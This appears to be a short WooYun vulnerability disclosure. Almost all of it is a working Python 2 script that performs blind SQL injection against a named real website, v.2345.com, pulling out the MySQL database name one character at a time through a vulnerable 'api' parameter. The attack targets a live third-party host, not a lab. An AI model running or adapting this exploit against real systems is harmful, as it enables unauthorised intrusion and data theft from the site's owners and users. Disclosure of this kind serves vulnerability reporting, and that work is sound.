WooYun.org

database()长度为13
#encoding=utf-8
import httplib
import time
import string
import sys
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36',
}
payloads = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.')
print '[%s] Start to retrive MySQL database()' % time.strftime('%H:%M:%S', time.localtime())
database = ''
for i in range(1,14,1):
for payload in payloads:
conn = httplib.HTTPConnection('v.2345.com:80', timeout=20)
conn.request(method='GET', url="/moviecore/server/variety/index.php?act=ajaxMoreEpisode&api=-1%27%20or%20ascii(substr(database(),"+str(i)+",1))="+str(ord(payload))+"--%20&ctl=newDetail&id=18363&month=0&nowTotal=14&time=1461014443020&timeStamp=1461014443020&total=14&year=2015")
status = conn.getresponse().status
if status == 500:
database += payload
print '\r[scan in progress]' ,database
time.sleep(0.01)
break
conn.close()
print ''
print 'database() is', database